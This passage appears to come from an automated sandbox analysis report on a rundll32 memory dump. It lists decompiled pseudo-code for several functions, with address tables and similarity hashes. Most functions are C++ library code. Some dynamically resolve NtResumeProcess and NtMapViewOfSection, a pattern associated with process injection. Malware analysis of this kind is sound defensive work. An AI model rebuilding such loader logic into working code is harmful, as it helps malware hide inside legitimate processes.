				return LeaveCriticalSection(??);
			}




















                0x21520591610
                0x21520591614
                0x2152059161f
                0x21520591627
                0x2152059162b
                0x2152059162f
                0x21520591633
                0x21520591637
                0x2152059163a
                0x2152059163d
                0x21520591648
                0x21520591651
                0x21520591657
                0x2152059165b
                0x21520591666
                0x2152059166a
                0x21520591676
                0x21520591683
                0x2152059168e
                0x2152059169a
                0x215205916aa
                0x215205916b0
                0x215205916b4
                0x215205916ba
                0x215205916be
                0x215205916c5
                0x215205916d0
                0x215205916d7
                0x215205916d9
                0x215205916e0
                0x215205916e5
                0x215205916e9
                0x215205916f2
                0x215205916fa
                0x2152059170b
                0x2152059170f
                0x21520591715
                0x2152059171e
                0x21520591720
                0x21520591729
                0x2152059172f
                0x21520591733
                0x2152059173e
                0x21520591742
                0x2152059174e
                0x2152059175b
                0x21520591766
                0x21520591772
                0x21520591782
                0x21520591788
                0x2152059178b
                0x21520591794
                0x21520591798
                0x215205917bb

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception__std_exception_copy$Throw$CriticalEnterFileHeaderRaiseSection
                • String ID: Invalid service owner.$Service already exists.
                • API String ID: 827508800-4115445021
                • Opcode ID: fb3683fc151cd7cdfbb042e89559c00cc1587cf7cb1217f112951179ae886385
                • Instruction ID: e8d9458c466d608065093a34c963c9932a22f228e03d7a7ab85060fc72436fc7
                • Opcode Fuzzy Hash: fb3683fc151cd7cdfbb042e89559c00cc1587cf7cb1217f112951179ae886385
                • Instruction Fuzzy Hash: 56512433702F64D9EB10CBA0E8882D833A9FBA8788F5545A6DE4D53B98EF34C555C394
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205BC290 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 72%
                			E00000215215205BC290(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				long long _v32;
				long long _v40;
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t30;
				void* _t33;
				void* _t44;
				void* _t46;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr* _t66;
				intOrPtr _t72;
				intOrPtr _t81;
				signed long long _t82;
				long long _t83;
				void* _t84;

				_t55 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t84 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t83 =  *0x20683530; // 0x0
				_a24 = _t83;
				_t81 =  *0x20681950; // 0x0
				if (_t81 != 0) goto 0x205bc30c;
				E00000215215205D19DC(0,  &_a8);
				_t46 =  *0x20681950 - _t81; // 0x0
				if (_t46 != 0) goto 0x205bc2fb;
				_t30 =  *0x20681908; // 0x0
				 *0x20681908 = _t30 + 1;
				 *0x20681950 = _t55;
				_t33 = E00000215215205D1A5C(_t55,  &_a8);
				_t82 =  *0x20681950; // 0x0
				_t72 = _a8;
				if (_t82 -  *((intOrPtr*)(_t72 + 0x18)) >= 0) goto 0x205bc329;
				_t56 =  *((intOrPtr*)(_t72 + 0x10));
				if ( *((intOrPtr*)(_t56 + _t82 * 8)) != 0) goto 0x205bc3c6;
				goto 0x205bc32b;
				if ( *((char*)(_t72 + 0x24)) == 0) goto 0x205bc344;
				E00000215215205D6CC0(_t33);
				if (_t82 -  *((intOrPtr*)(_t56 + 0x18)) >= 0) goto 0x205bc349;
				_t57 =  *((intOrPtr*)(_t56 + 0x10));
				if ( *((intOrPtr*)(_t57 + _t82 * 8)) != 0) goto 0x205bc3c6;
				if (_t83 == 0) goto 0x205bc353;
				goto 0x205bc3c6;
				E00000215215205B7890(0, _t44, _t83,  &_a24, _t84, _t83);
				if (_t57 != 0xffffffff) goto 0x205bc3a8;
				_v48 = 0x206278d0;
				_v40 = 0x206278d0;
				_v32 = 0x206278d0;
				_v40 = "bad cast";
				_v48 = 0x20628048;
				E00000215215205F9940(_t83,  &_v48, 0x2066bb90, _t83);
				asm("int3");
				_t66 = _a24;
				 *0x20683530 = _t66;
				 *((intOrPtr*)( *_t66 + 8))();
				return E00000215215205D1A5C(E00000215215205D6C88(0x20628048, _t66),  &_a16);
			}





















                0x215205bc290
                0x215205bc298
                0x215205bc2a1
                0x215205bc2a6
                0x215205bc2b0
                0x215205bc2b6
                0x215205bc2bd
                0x215205bc2c2
                0x215205bc2cc
                0x215205bc2d5
                0x215205bc2db
                0x215205bc2e2
                0x215205bc2e4
                0x215205bc2ec
                0x215205bc2f4
                0x215205bc300
                0x215205bc305
                0x215205bc30c
                0x215205bc314
                0x215205bc316
                0x215205bc321
                0x215205bc327
                0x215205bc32f
                0x215205bc331
                0x215205bc33a
                0x215205bc33c
                0x215205bc347
                0x215205bc34c
                0x215205bc351
                0x215205bc35b
                0x215205bc364
                0x215205bc36d
                0x215205bc374
                0x215205bc379
                0x215205bc385
                0x215205bc391
                0x215205bc3a2
                0x215205bc3a7
                0x215205bc3a8
                0x215205bc3ad
                0x215205bc3ba
                0x215205bc3df

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID: bad cast
                • API String ID: 1824299764-3145022300
                • Opcode ID: 9d26909156540afe185f4668f8e219048678aadbe9bf4adc24b25214e70df52f
                • Instruction ID: c7109b040a31b44ac178b61ad00e574eb1504c6f7f96b9086c831cd64e036121
                • Opcode Fuzzy Hash: 9d26909156540afe185f4668f8e219048678aadbe9bf4adc24b25214e70df52f
                • Instruction Fuzzy Hash: 0841BF33303F60C1EA209B15E4582D967A4FBE57A0F6842A2EE9D077ACDB38E446C304
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520587CB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 64libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 40%
                			E0000021521520587CB0(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, signed char** __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v272;
				intOrPtr _v292;
				long long _v304;
				char _v312;
				void* __rdi;
				signed int _t21;
				void* _t30;
				void* _t33;
				void* _t34;
				signed char** _t43;
				void* _t64;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t64 = __rcx;
				r8d = 0x128;
				_t43 = __r9;
				E00000215215205F8EF0(_t30, 0, _t33, _t34,  &_v312, __rdx, __r8, __r8);
				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0x20587cf1;
				goto 0x20587cf4;
				_v304 = __r8;
				_v292 =  *((intOrPtr*)(__r8 + 0x10));
				if (_t43[2] == 0) goto 0x20587d31;
				if (_t43[3] - 0x10 < 0) goto 0x20587d11;
				asm("o16 nop [eax+eax]");
				_t21 =  *( *_t43) & 0x000000ff;
				_v272 = _t21;
				if (_t21 != 0) goto 0x20587d20;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				 *((long long*)(__r8))();
				 *((long long*)(__r8))();
				if (_t64 == 0) goto 0x20587d8b;
				E00000215215205C9E18(__r8,  &_v312, "NtResumeProcess", __rdx, _t64);
				CloseHandle(??);
				return 1;
			}















                0x21520587cb0
                0x21520587cb5
                0x21520587cba
                0x21520587ccd
                0x21520587cd2
                0x21520587cdd
                0x21520587ce0
                0x21520587cea
                0x21520587cef
                0x21520587cf9
                0x21520587d01
                0x21520587d05
                0x21520587d0c
                0x21520587d16
                0x21520587d20
                0x21520587d27
                0x21520587d2f
                0x21520587d38
                0x21520587d4b
                0x21520587d5e
                0x21520587d67
                0x21520587d6b
                0x21520587d70
                0x21520587d7d
                0x21520587d85
                0x21520587da5

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleProc$CloseModule
                • String ID: NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 133214361-1717905385
                • Opcode ID: 6030877f1eb43a60b0b866ad09762e0b622c24f5cde4c8e934917fe96ebc2ba6
                • Instruction ID: ecf62530fcb7da97a6a97c6a928a41e5d682f5f734f3678f0274906634f7278e
                • Opcode Fuzzy Hash: 6030877f1eb43a60b0b866ad09762e0b622c24f5cde4c8e934917fe96ebc2ba6
                • Instruction Fuzzy Hash: 09217A33306FA4C6EB14DB21E4487E96360EBA9FC0F5840A1DE5A47B99DF39C696C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CAA5C Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 48libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 50%
                			E00000215215205CAA5C(long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, char _a32) {
				void* _v24;
				char _v40;
				intOrPtr _v48;
				signed int _v56;
				intOrPtr _v64;
				long long _v72;
				long long _v80;
				signed long long _v88;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t48;
				void* _t54;
				void* _t59;
				WCHAR* _t61;

				_t59 = _t54;
				 *((long long*)(_t59 + 8)) = __rbx;
				 *((long long*)(_t59 + 0x10)) = __rbp;
				 *(_t59 - 0x28) =  *(_t59 - 0x28) & 0x00000000;
				 *(_t59 + 0x20) =  *(_t59 + 0x20) & 0x00000000;
				 *((intOrPtr*)(_t59 + 0x24)) = 0;
				GetModuleHandleW(_t61);
				GetProcAddress(_t45);
				GetProcAddress(_t48);
				_v48 = 0x40;
				r9d = 0;
				_v56 = _v56 & 0x00000000;
				_v64 = 2;
				_v72 =  &_v40;
				_v80 =  &_a32;
				_v88 = _v88 & 0x00000000;
				 *__rax();
				return  *__rax();
			}
















                0x215205caa5c
                0x215205caa5f
                0x215205caa63
                0x215205caa6f
                0x215205caa77
                0x215205caa88
                0x215205caa8f
                0x215205caaa2
                0x215205caab5
                0x215205caabb
                0x215205caac3
                0x215205caac6
                0x215205caace
                0x215205caadb
                0x215205caaee
                0x215205caaf6
                0x215205caafc
                0x215205cab16

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: @$NtMapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 667068680-1608534789
                • Opcode ID: fc45787890a71328f2095b7604e39bab7b7ac5c3e977fde0e36e41eb77b27573
                • Instruction ID: efc59f2cc50db9beaffa59b80b295d06a182ae1956dc92bcbd1c4b7d674fef08
                • Opcode Fuzzy Hash: fc45787890a71328f2095b7604e39bab7b7ac5c3e977fde0e36e41eb77b27573
                • Instruction Fuzzy Hash: AF115872201B50CAE7609F22F848B9977A4FB98BE4F654135DE4D43758DF79C589CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520608064 Relevance: 10.6, APIs: 7, Instructions: 119COMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E0000021521520608064(void* __edx, void* __eflags, long long __rbx, char* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, intOrPtr _a48) {
				void* _v40;
				char _v48;
				signed long long _v64;
				intOrPtr _v72;
				signed int _v96;
				signed int _v104;
				void* _t23;
				void* _t32;
				void* _t52;
				signed long long _t53;
				void* _t56;
				int _t66;
				void* _t75;
				int _t83;
				char* _t85;
				int _t88;
				void* _t89;
				int _t91;

				_t52 = _t75;
				 *((long long*)(_t52 + 8)) = __rbx;
				 *((long long*)(_t52 + 0x10)) = __rbp;
				 *((long long*)(_t52 + 0x18)) = __rsi;
				_t89 = __rdx;
				_t56 = __r8;
				E00000215215205FA5D4(_t52, __r8, _t52 - 0x48, _a48);
				_t53 = _v64;
				r12d =  *((intOrPtr*)(_t53 + 0x18));
				if (__rcx == 0) goto 0x206080c1;
				if (_t89 == 0) goto 0x206080c1;
				 *__rcx = 0;
				if (__r8 == 0) goto 0x206080c1;
				if (__r9 != 0) goto 0x206080d3;
				_t23 = E0000021521520603944(_t53);
				 *_t53 = 0x16;
				E00000215215205FAABC(_t23);
				goto 0x20608104;
				_v96 = _v96 & 0x00000000;
				r9d = r9d | 0xffffffff;
				_v104 = _v104 & 0x00000000;
				if (MultiByteToWideChar(_t91, _t88, _t85) != 0) goto 0x20608108;
				E00000215215206038D4(GetLastError(), _t53, __r8);
				goto 0x20608151;
				E0000021521520603D7C(_t53, _t25 + _t25);
				if (_t53 == 0) goto 0x20608147;
				_v96 = 0;
				r9d = r9d | 0xffffffff;
				_v104 = _t53;
				if (MultiByteToWideChar(_t83, _t66, ??, ??) != 0) goto 0x20608185;
				E00000215215206038D4(GetLastError(), _t53, _t56);
				_t32 = E000002152152060A780(_t53, _t53);
				if (_v48 == 0) goto 0x20608164;
				 *(_v72 + 0x3a8) =  *(_v72 + 0x3a8) & 0xfffffffd;
				return _t32;
			}





















                0x21520608064
                0x21520608067
                0x2152060806b
                0x2152060806f
                0x21520608088
                0x21520608098
                0x2152060809b
                0x215206080a0
                0x215206080a5
                0x215206080ac
                0x215206080b1
                0x215206080b3
                0x215206080ba
                0x215206080bf
                0x215206080c1
                0x215206080c6
                0x215206080cc
                0x215206080d1
                0x215206080d3
                0x215206080d8
                0x215206080dc
                0x215206080f5
                0x215206080ff
                0x21520608106
                0x2152060810e
                0x21520608119
                0x2152060811b
                0x2152060811f
                0x21520608126
                0x21520608138
                0x21520608142
                0x2152060814c
                0x21520608156
                0x2152060815d
                0x21520608184

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharErrorLastMultiWide$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 351348912-0
                • Opcode ID: 1b7341a35a17c1a4410c1fa4f711147b759dae2ad749b8b3b14199354af20588
                • Instruction ID: 4489bc5de262e6b362a288c53a308a808aa6cfd971ebd72eb17892d2ce278120
                • Opcode Fuzzy Hash: 1b7341a35a17c1a4410c1fa4f711147b759dae2ad749b8b3b14199354af20588
                • Instruction Fuzzy Hash: 0E41B633346F60C5EA74DB26A80C7DB6696BFE4BD4F2842A49E89077D9DF38D4458700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D1F7C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D1F7C(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t42;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				signed long long _t56;
				intOrPtr _t63;
				intOrPtr* _t77;
				long long _t78;
				void* _t79;

				_t50 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t79 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t78 =  *0x206818e8; // 0x0
				_a24 = _t78;
				_t55 =  *0x20683598; // 0x0
				if (_t55 != 0) goto 0x205d1ff7;
				E00000215215205D19DC(0,  &_a8);
				_t42 =  *0x20683598 - _t55; // 0x0
				if (_t42 != 0) goto 0x205d1fe6;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20683598 = _t50;
				_t29 = E00000215215205D1A5C(_t50,  &_a8);
				_t56 =  *0x20683598; // 0x0
				_t63 = _a8;
				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0x205d200b;
				_t51 =  *((intOrPtr*)(_t63 + 0x10));
				goto 0x205d200d;
				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0x205d209a;
				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0x205d2033;
				E00000215215205D6CC0(_t29);
				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0x205d2031;
				_t52 =  *((intOrPtr*)(_t51 + 0x10));
				goto 0x205d2033;
				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0x205d209a;
				if (_t78 == 0) goto 0x205d2042;
				goto 0x205d209a;
				E00000215215205D29AC(0, 0, _t56,  &_a24, _t79, _t78, _t79);
				if (_t52 != 0xffffffff) goto 0x205d2071;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t56,  &_v48, 0x2066bb90, _t78);
				asm("int3");
				_t77 = _a24;
				 *0x206818e8 = _t77;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t52, _t77),  &_a16);
			}



















                0x215205d1f7c
                0x215205d1f84
                0x215205d1f8d
                0x215205d1f92
                0x215205d1f9c
                0x215205d1fa2
                0x215205d1fa9
                0x215205d1fae
                0x215205d1fb8
                0x215205d1fc1
                0x215205d1fc6
                0x215205d1fcd
                0x215205d1fcf
                0x215205d1fd7
                0x215205d1fdf
                0x215205d1feb
                0x215205d1ff0
                0x215205d1ff7
                0x215205d1fff
                0x215205d2001
                0x215205d2009
                0x215205d2010
                0x215205d201a
                0x215205d201c
                0x215205d2025
                0x215205d2027
                0x215205d202f
                0x215205d2036
                0x215205d203b
                0x215205d2040
                0x215205d204a
                0x215205d2053
                0x215205d205a
                0x215205d206b
                0x215205d2070
                0x215205d2071
                0x215205d2076
                0x215205d2087
                0x215205d208f
                0x215205d20b3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 0344d0fdbe09caf33f4fb4071f3559366755687187d51fe158e8f5e4b3e98a31
                • Instruction ID: 7fc703aaad432106fd58d205a31b9a7dd21fc9df49ecdb288d892bd833193c97
                • Opcode Fuzzy Hash: 0344d0fdbe09caf33f4fb4071f3559366755687187d51fe158e8f5e4b3e98a31
                • Instruction Fuzzy Hash: 7B314C33306E20D1EA219B25E59C2D96361EBF47E0F680292AE5D076EDDE34D483C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205DA05C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205DA05C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681bc0; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b10; // 0x0
				if (_t56 != 0) goto 0x205da0d7;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b10 - _t56; // 0x0
				if (_t43 != 0) goto 0x205da0c6;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b10 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b10; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205da0eb;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205da0ed;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205da17a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205da113;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205da111;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205da113;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205da17a;
				if (_t79 == 0) goto 0x205da122;
				goto 0x205da17a;
				E00000215215205DC9E4(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205da151;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681bc0 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205da05c
                0x215205da064
                0x215205da06d
                0x215205da072
                0x215205da07c
                0x215205da082
                0x215205da089
                0x215205da08e
                0x215205da098
                0x215205da0a1
                0x215205da0a6
                0x215205da0ad
                0x215205da0af
                0x215205da0b7
                0x215205da0bf
                0x215205da0cb
                0x215205da0d0
                0x215205da0d7
                0x215205da0df
                0x215205da0e1
                0x215205da0e9
                0x215205da0f0
                0x215205da0fa
                0x215205da0fc
                0x215205da105
                0x215205da107
                0x215205da10f
                0x215205da116
                0x215205da11b
                0x215205da120
                0x215205da12a
                0x215205da133
                0x215205da13a
                0x215205da14b
                0x215205da150
                0x215205da151
                0x215205da156
                0x215205da167
                0x215205da16f
                0x215205da193

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: cd121cf2d571eea744ee26f31ff072a59a2cbaf16eaf3f45634907714eb43b4e
                • Instruction ID: 72a94bb9b22069f78df4bd1ab3b2b4fc76caa3d45a333973e3a408e28f8e71c1
                • Opcode Fuzzy Hash: cd121cf2d571eea744ee26f31ff072a59a2cbaf16eaf3f45634907714eb43b4e
                • Instruction Fuzzy Hash: 42315A37306E20C1EA219B25E9582EA6365EBE4BE0F184292EE6D077EDDF34D447C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D20B4 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 62%
                			E00000215215205D20B4(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t37;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x206818f0; // 0x0
				_a24 = _t79;
				_t56 =  *0x206835c0; // 0x0
				if (_t56 != 0) goto 0x205d212f;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x206835c0 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d211e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x206835c0 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x206835c0; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d2143;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d2145;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d21d2;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d216b;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d2169;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d216b;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d21d2;
				if (_t79 == 0) goto 0x205d217a;
				goto 0x205d21d2;
				E00000215215205D2A70(_t37, 0, 0, _t57,  &_a24, _t80);
				if (_t53 != 0xffffffff) goto 0x205d21a9;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x206818f0 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d20b4
                0x215205d20bc
                0x215205d20c5
                0x215205d20ca
                0x215205d20d4
                0x215205d20da
                0x215205d20e1
                0x215205d20e6
                0x215205d20f0
                0x215205d20f9
                0x215205d20fe
                0x215205d2105
                0x215205d2107
                0x215205d210f
                0x215205d2117
                0x215205d2123
                0x215205d2128
                0x215205d212f
                0x215205d2137
                0x215205d2139
                0x215205d2141
                0x215205d2148
                0x215205d2152
                0x215205d2154
                0x215205d215d
                0x215205d215f
                0x215205d2167
                0x215205d216e
                0x215205d2173
                0x215205d2178
                0x215205d2182
                0x215205d218b
                0x215205d2192
                0x215205d21a3
                0x215205d21a8
                0x215205d21a9
                0x215205d21ae
                0x215205d21bf
                0x215205d21c7
                0x215205d21eb

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrownumpunct
                • String ID:
                • API String ID: 1441279842-0
                • Opcode ID: a85674cbe9314ef8e78f8243866b22fcd257b156196965237d276de173b0bee3
                • Instruction ID: 4e41195d9e28ec866757d14f8e9c8e3ee4e8f7032f0b6fc798409cea479abf59
                • Opcode Fuzzy Hash: a85674cbe9314ef8e78f8243866b22fcd257b156196965237d276de173b0bee3
                • Instruction Fuzzy Hash: 5F313D33306E24C1EA219B25E9582E96361EBF4BE4F284292EE6D477EDDA34D447C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205DA194 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 62%
                			E00000215215205DA194(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t37;
				void* _t44;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed long long _t58;
				intOrPtr _t65;
				intOrPtr* _t79;
				long long _t80;
				void* _t81;

				_t52 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t81 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t80 =  *0x20681c28; // 0x0
				_a24 = _t80;
				_t57 =  *0x20681b68; // 0x0
				if (_t57 != 0) goto 0x205da20f;
				E00000215215205D19DC(0,  &_a8);
				_t44 =  *0x20681b68 - _t57; // 0x0
				if (_t44 != 0) goto 0x205da1fe;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b68 = _t52;
				_t29 = E00000215215205D1A5C(_t52,  &_a8);
				_t58 =  *0x20681b68; // 0x0
				_t65 = _a8;
				if (_t58 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0x205da223;
				_t53 =  *((intOrPtr*)(_t65 + 0x10));
				goto 0x205da225;
				if ( *((intOrPtr*)(_t53 + _t58 * 8)) != 0) goto 0x205da2b2;
				if ( *((intOrPtr*)(_t65 + 0x24)) == dil) goto 0x205da24b;
				E00000215215205D6CC0(_t29);
				if (_t58 -  *((intOrPtr*)(_t53 + 0x18)) >= 0) goto 0x205da249;
				_t54 =  *((intOrPtr*)(_t53 + 0x10));
				goto 0x205da24b;
				if ( *((intOrPtr*)(_t54 + _t58 * 8)) != 0) goto 0x205da2b2;
				if (_t80 == 0) goto 0x205da25a;
				goto 0x205da2b2;
				E00000215215205DCAA8(_t37, 0, 0, _t58,  &_a24, _t81);
				if (_t54 != 0xffffffff) goto 0x205da289;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t58,  &_v48, 0x2066bb90, _t80);
				asm("int3");
				_t79 = _a24;
